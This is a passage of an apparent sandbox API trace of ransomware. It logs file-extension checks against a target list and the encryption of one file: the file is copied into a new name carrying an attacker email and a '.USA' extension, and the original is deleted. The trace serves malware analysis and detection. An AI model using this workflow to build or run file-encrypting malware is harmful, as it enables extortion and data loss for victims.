(lpString=".xls") returned 4 [0042.729] lstrcmpiW (lpString1=".xls", lpString2=".emf") returned 1 [0042.729] lstrlenW (lpString=".xlsx") returned 5 [0042.729] lstrcmpiW (lpString1=".xlsx", lpString2="s.emf") returned -1 [0042.729] lstrlenW (lpString=".ppt") returned 4 [0042.729] lstrcmpiW (lpString1=".ppt", lpString2=".emf") returned 1 [0042.729] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf") returned 74 [0042.729] lstrlenW (lpString=".zip") returned 4 [0042.729] lstrcmpiW (lpString1=".zip", lpString2=".emf") returned 1 [0042.729] lstrlenW (lpString=".rar") returned 4 [0042.729] lstrcmpiW (lpString1=".rar", lpString2=".emf") returned 1 [0042.729] lstrlenW (lpString=".bz2") returned 4 [0042.729] lstrcmpiW (lpString1=".bz2", lpString2=".emf") returned -1 [0042.729] lstrlenW (lpString=".7z") returned 3 [0042.729] lstrcmpiW (lpString1=".7z", lpString2="emf") returned -1 [0042.729] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf") returned 74 [0042.729] lstrlenW (lpString=".dbf") returned 4 [0042.729] lstrcmpiW (lpString1=".dbf", lpString2=".emf") returned -1 [0042.730] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf") returned 74 [0042.730] lstrlenW (lpString=".1cd") returned 4 [0042.730] lstrcmpiW (lpString1=".1cd", lpString2=".emf") returned -1 [0042.730] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf") returned 74 [0042.730] lstrlenW (lpString=".jpg") returned 4 [0042.730] lstrcmpiW (lpString1=".jpg", lpString2=".emf") returned 1 [0042.730] lstrcmpiW (lpString1=".htm", lpString2=".USA") returned -1 [0042.730] lstrlenW (lpString="Garden.htm") returned 10 [0042.730] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0042.730] GetFileSizeEx (in: hFile=0x200, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=231) returned 1 [0042.730] CloseHandle (hObject=0x200) returned 1 [0042.730] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.htm")) returned 0x20 [0042.730] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.htm.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0042.730] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0042.730] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm") returned 68 [0042.730] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm") returned 68 [0042.730] lstrlenW (lpString=".doc") returned 4 [0042.731] lstrcmpiW (lpString1=".doc", lpString2=".htm") returned -1 [0042.731] lstrlenW (lpString=".docx") returned 5 [0042.731] lstrcmpiW (lpString1=".docx", lpString2="n.htm") returned -1 [0042.731] lstrlenW (lpString=".pdf") returned 4 [0042.731] lstrcmpiW (lpString1=".pdf", lpString2=".htm") returned 1 [0042.731] lstrlenW (lpString=".xls") returned 4 [0042.731] lstrcmpiW (lpString1=".xls", lpString2=".htm") returned 1 [0042.731] lstrlenW (lpString=".xlsx") returned 5 [0042.731] lstrcmpiW (lpString1=".xlsx", lpString2="n.htm") returned -1 [0042.731] lstrlenW (lpString=".ppt") returned 4 [0042.731] lstrcmpiW (lpString1=".ppt", lpString2=".htm") returned 1 [0042.731] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm") returned 68 [0042.731] lstrlenW (lpString=".zip") returned 4 [0042.731] lstrcmpiW (lpString1=".zip", lpString2=".htm") returned 1 [0042.731] lstrlenW (lpString=".rar") returned 4 [0042.731] lstrcmpiW (lpString1=".rar", lpString2=".htm") returned 1 [0042.731] lstrlenW (lpString=".bz2") returned 4 [0042.731] lstrcmpiW (lpString1=".bz2", lpString2=".htm") returned -1 [0042.731] lstrlenW (lpString=".7z") returned 3 [0042.731] lstrcmpiW (lpString1=".7z", lpString2="htm") returned -1 [0042.731] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm") returned 68 [0042.731] lstrlenW (lpString=".dbf") returned 4 [0042.731] lstrcmpiW (lpString1=".dbf", lpString2=".htm") returned -1 [0042.731] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm") returned 68 [0042.731] lstrlenW (lpString=".1cd") returned 4 [0042.731] lstrcmpiW (lpString1=".1cd", lpString2=".htm") returned -1 [0042.731] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm") returned 68 [0042.731] lstrlenW (lpString=".jpg") returned 4 [0042.731] lstrcmpiW (lpString1=".jpg", lpString2=".htm") returned 1 [0042.731] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm") returned 68 [0042.731] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm") returned 68 [0042.731] lstrlenW (lpString=".doc") returned 4 [0042.731] lstrcmpiW (lpString1=".doc", lpString2=".htm") returned -1 [0042.731] lstrlenW (lpString=".docx") returned 5 [0042.732] lstrcmpiW (lpString1=".docx", lpString2="n.htm") returned -1 [0042.732] lstrlenW (lpString=".pdf") returned 4 [0042.732] lstrcmpiW (lpString1=".pdf", lpString2=".htm") returned 1 [0042.732] lstrlenW (lpString=".xls") returned 4 [0042.732] lstrcmpiW (lpString1=".xls", lpString2=".htm") returned 1 [0042.732] lstrlenW (lpString=".xlsx") returned 5 [0042.732] lstrcmpiW (lpString1=".xlsx", lpString2="n.htm") returned -1 [0042.732] lstrlenW (lpString=".ppt") returned 4 [0042.732] lstrcmpiW (lpString1=".ppt", lpString2=".htm") returned 1 [0042.732] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm") returned 68 [0042.732] lstrlenW (lpString=".zip") returned 4 [0042.732] lstrcmpiW (lpString1=".zip", lpString2=".htm") returned 1 [0042.732] lstrlenW (lpString=".rar") returned 4 [0042.732] lstrcmpiW (lpString1=".rar", lpString2=".htm") returned 1 [0042.732] lstrlenW (lpString=".bz2") returned 4 [0042.732] lstrcmpiW (lpString1=".bz2", lpString2=".htm") returned -1 [0042.732] lstrlenW (lpString=".7z") returned 3 [0042.732] lstrcmpiW (lpString1=".7z", lpString2="htm") returned -1 [0042.732] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm") returned 68 [0042.732] lstrlenW (lpString=".dbf") returned 4 [0042.732] lstrcmpiW (lpString1=".dbf", lpString2=".htm") returned -1 [0042.732] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm") returned 68 [0042.732] lstrlenW (lpString=".1cd") returned 4 [0042.732] lstrcmpiW (lpString1=".1cd", lpString2=".htm") returned -1 [0042.732] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm") returned 68 [0042.732] lstrlenW (lpString=".jpg") returned 4 [0042.732] lstrcmpiW (lpString1=".jpg", lpString2=".htm") returned 1 [0042.732] lstrcmpiW (lpString1=".jpg", lpString2=".USA") returned -1 [0042.732] lstrlenW (lpString="Garden.jpg") returned 10 [0042.732] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0042.733] GetFileSizeEx (in: hFile=0x200, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=23871) returned 1 [0042.733] CloseHandle (hObject=0x200) returned 1 [0042.733] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.jpg")) returned 0x20 [0042.733] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.jpg.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0042.733] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0042.733] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg") returned 68 [0042.733] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg") returned 68 [0042.733] lstrlenW (lpString=".doc") returned 4 [0042.733] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1 [0042.733] lstrlenW (lpString=".docx") returned 5 [0042.733] lstrcmpiW (lpString1=".docx", lpString2="n.jpg") returned -1 [0042.733] lstrlenW (lpString=".pdf") returned 4 [0042.733] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1 [0042.733] lstrlenW (lpString=".xls") returned 4 [0042.733] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1 [0042.733] lstrlenW (lpString=".xlsx") returned 5 [0042.733] lstrcmpiW (lpString1=".xlsx", lpString2="n.jpg") returned -1 [0042.733] lstrlenW (lpString=".ppt") returned 4 [0042.733] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1 [0042.733] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg") returned 68 [0042.734] lstrlenW (lpString=".zip") returned 4 [0042.734] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1 [0042.734] lstrlenW (lpString=".rar") returned 4 [0042.734] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1 [0042.734] lstrlenW (lpString=".bz2") returned 4 [0042.734] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1 [0042.734] lstrlenW (lpString=".7z") returned 3 [0042.734] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1 [0042.734] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg") returned 68 [0042.734] lstrlenW (lpString=".dbf") returned 4 [0042.734] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1 [0042.734] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg") returned 68 [0042.734] lstrlenW (lpString=".1cd") returned 4 [0042.734] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1 [0042.734] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg") returned 68 [0042.734] lstrlenW (lpString=".jpg") returned 4 [0042.734] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0 [0042.734] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg") returned 68 [0042.734] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg") returned 68 [0042.734] lstrlenW (lpString=".doc") returned 4 [0042.734] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1 [0042.734] lstrlenW (lpString=".docx") returned 5 [0042.734] lstrcmpiW (lpString1=".docx", lpString2="n.jpg") returned -1 [0042.734] lstrlenW (lpString=".pdf") returned 4 [0042.734] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1 [0042.734] lstrlenW (lpString=".xls") returned 4 [0042.734] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1 [0042.734] lstrlenW (lpString=".xlsx") returned 5 [0042.734] lstrcmpiW (lpString1=".xlsx", lpString2="n.jpg") returned -1 [0042.734] lstrlenW (lpString=".ppt") returned 4 [0042.734] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1 [0042.734] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg") returned 68 [0042.734] lstrlenW (lpString=".zip") returned 4 [0042.734] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1 [0042.735] lstrlenW (lpString=".rar") returned 4 [0042.735] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1 [0042.735] lstrlenW (lpString=".bz2") returned 4 [0042.735] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1 [0042.735] lstrlenW (lpString=".7z") returned 3 [0042.735] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1 [0042.735] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg") returned 68 [0042.735] lstrlenW (lpString=".dbf") returned 4 [0042.735] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1 [0042.735] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg") returned 68 [0042.735] lstrlenW (lpString=".1cd") returned 4 [0042.735] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1 [0042.735] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg") returned 68 [0042.735] lstrlenW (lpString=".jpg") returned 4 [0042.735] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0 [0042.735] lstrcmpiW (lpString1=".emf", lpString2=".USA") returned -1 [0042.735] lstrlenW (lpString="Genko_1.emf") returned 11 [0042.735] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\genko_1.emf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0042.934] GetFileSizeEx (in: hFile=0x208, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=5524) returned 1 [0042.934] CloseHandle (hObject=0x208) returned 1 [0042.934] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\genko_1.emf")) returned 0x20 [0042.935] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\genko_1.emf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0042.935] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\genko_1.emf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0042.935] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf") returned 69 [0042.935] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf") returned 69 [0042.935] lstrlenW (lpString=".doc") returned 4 [0042.935] lstrcmpiW (lpString1=".doc", lpString2=".emf") returned -1 [0042.935] lstrlenW (lpString=".docx") returned 5 [0042.935] lstrcmpiW (lpString1=".docx", lpString2="1.emf") returned -1 [0042.935] lstrlenW (lpString=".pdf") returned 4 [0042.935] lstrcmpiW (lpString1=".pdf", lpString2=".emf") returned 1 [0042.935] lstrlenW (lpString=".xls") returned 4 [0042.935] lstrcmpiW (lpString1=".xls", lpString2=".emf") returned 1 [0042.935] lstrlenW (lpString=".xlsx") returned 5 [0042.935] lstrcmpiW (lpString1=".xlsx", lpString2="1.emf") returned -1 [0042.935] lstrlenW (lpString=".ppt") returned 4 [0042.935] lstrcmpiW (lpString1=".ppt", lpString2=".emf") returned 1 [0042.935] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf") returned 69 [0042.935] lstrlenW (lpString=".zip") returned 4 [0042.935] lstrcmpiW (lpString1=".zip", lpString2=".emf") returned 1 [0042.935] lstrlenW (lpString=".rar") returned 4 [0042.935] lstrcmpiW (lpString1=".rar", lpString2=".emf") returned 1 [0042.935] lstrlenW (lpString=".bz2") returned 4 [0042.935] lstrcmpiW (lpString1=".bz2", lpString2=".emf") returned -1 [0042.935] lstrlenW (lpString=".7z") returned 3 [0042.935] lstrcmpiW (lpString1=".7z", lpString2="emf") returned -1 [0042.935] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf") returned 69 [0042.935] lstrlenW (lpString=".dbf") returned 4 [0042.935] lstrcmpiW (lpString1=".dbf", lpString2=".emf") returned -1 [0042.935] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf") returned 69 [0042.935] lstrlenW (lpString=".1cd") returned 4 [0042.936] lstrcmpiW (lpString1=".1cd", lpString2=".emf") returned -1 [0042.936] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf") returned 69 [0042.936] lstrlenW (lpString=".jpg") returned 4 [0042.936] lstrcmpiW (lpString1=".jpg", lpString2=".emf") returned 1 [0042.936] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf") returned 69 [0042.936] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf") returned 69 [0042.936] lstrlenW (lpString=".doc") returned 4 [0042.936] lstrcmpiW (lpString1=".doc", lpString2=".emf") returned -1 [0042.936] lstrlenW (lpString=".docx") returned 5 [0042.936] lstrcmpiW (lpString1=".docx", lpString2="1.emf") returned -1 [0042.936] lstrlenW (lpString=".pdf") returned 4 [0042.936] lstrcmpiW (lpString1=".pdf", lpString2=".emf") returned 1 [0042.936] lstrlenW (lpString=".xls") returned 4 [0042.936] lstrcmpiW (lpString1=".xls", lpString2=".emf") returned 1 [0042.936] lstrlenW (lpString=".xlsx") returned 5 [0042.936] lstrcmpiW (lpString1=".xlsx", lpString2="1.emf") returned -1 [0042.936] lstrlenW (lpString=".ppt") returned 4 [0042.936] lstrcmpiW (lpString1=".ppt", lpString2=".emf") returned 1 [0042.936] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf") returned 69 [0042.936] lstrlenW (lpString=".zip") returned 4 [0042.936] lstrcmpiW (lpString1=".zip", lpString2=".emf") returned 1 [0042.936] lstrlenW (lpString=".rar") returned 4 [0042.936] lstrcmpiW (lpString1=".rar", lpString2=".emf") returned 1 [0042.936] lstrlenW (lpString=".bz2") returned 4 [0042.936] lstrcmpiW (lpString1=".bz2", lpString2=".emf") returned -1 [0042.936] lstrlenW (lpString=".7z") returned 3 [0042.936] lstrcmpiW (lpString1=".7z", lpString2="emf") returned -1 [0042.936] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf") returned 69 [0042.936] lstrlenW (lpString=".dbf") returned 4 [0042.936] lstrcmpiW (lpString1=".dbf", lpString2=".emf") returned -1 [0042.936] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf") returned 69 [0042.936] lstrlenW (lpString=".1cd") returned 4 [0042.936] lstrcmpiW (lpString1=".1cd", lpString2=".emf") returned -1 [0042.936] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf") returned 69 [0042.937] lstrlenW (lpString=".jpg") returned 4 [0042.937] lstrcmpiW (lpString1=".jpg", lpString2=".emf") returned 1 [0042.937] lstrcmpiW (lpString1=".PNG", lpString2=".USA") returned -1 [0042.937] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0042.937] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0044.837] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=19780) returned 1 [0044.838] CloseHandle (hObject=0x210) returned 1 [0044.838] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\thmbnail.png")) returned 0x20 [0044.838] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\thmbnail.png.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0044.838] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0044.838] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0044.838] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0044.838] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\thmbnail.png.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0044.838] GetLastError () returned 0x0 [0044.838] ReadFile (in: hFile=0x210, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x4d44, lpOverlapped=0x0) returned 1 [0044.843] WriteFile (in: hFile=0x208, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x4d50, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0x4d50, lpOverlapped=0x0) returned 1 [0044.844] ReadFile (in: hFile=0x210, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0044.844] WriteFile (in: hFile=0x208, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0044.844] SetEndOfFile (hFile=0x208) returned 1 [0044.844] CloseHandle (hObject=0x208) returned 1 [0044.845] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0044.845] SetEndOfFile (hFile=0x210) returned 1 [0044.846] CloseHandle (hObject=0x210) returned 1 [0044.846] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0044.846] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\thmbnail.png")) returned 1 [0044.846] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG") returned 75 [0044.846] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG") returned 75 [0044.846] lstrlenW (lpString=".doc") returned 4 [0044.846] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0044.846] lstrlenW (lpString=".docx") returned 5 [0044.846] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0044.846] lstrlenW (lpString=".pdf") returned 4 [0044.846] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0044.847] lstrlenW (lpString=".xls") returned 4 [0044.847] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0044.847] lstrlenW (lpString=".xlsx") returned 5 [0044.847] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0044.847] lstrlenW (lpString=".ppt") returned 4 [0044.847] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0044.847] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG") returned 75 [0044.847] lstrlenW (lpString=".zip") returned 4 [0044.847] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0044.847] lstrlenW (lpString=".rar") returned 4 [0044.847] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0044.847] lstrlenW (lpString=".bz2") returned 4 [0044.847] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0044.847] lstrlenW (lpString=".7z") returned 3 [0044.847] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0044.847] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG") returned 75 [0044.847] lstrlenW (lpString=".dbf") returned 4 [0044.847] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0044.847] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG") returned 75 [0044.847] lstrlenW (lpString=".1cd") returned 4 [0044.847] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0044.847] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG") returned 75 [0044.847] lstrlenW (lpString=".jpg") returned 4 [0044.847] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0044.847] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG") returned 75 [0044.847] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG") returned 75 [0044.847] lstrlenW (lpString=".doc") returned 4 [0044.847] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0044.847] lstrlenW (lpString=".docx") returned 5 [0044.847] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0044.847] lstrlenW (lpString=".pdf") returned 4 [0044.847] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0044.847] lstrlenW (lpString=".xls") returned 4 [0044.847] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0044.847] lstrlenW (lpString=".xlsx") returned 5 [0044.848] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0044.848] lstrlenW (lpString=".ppt") returned 4 [0044.848] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0044.848] lstrlenW (lpString="C:\\Program 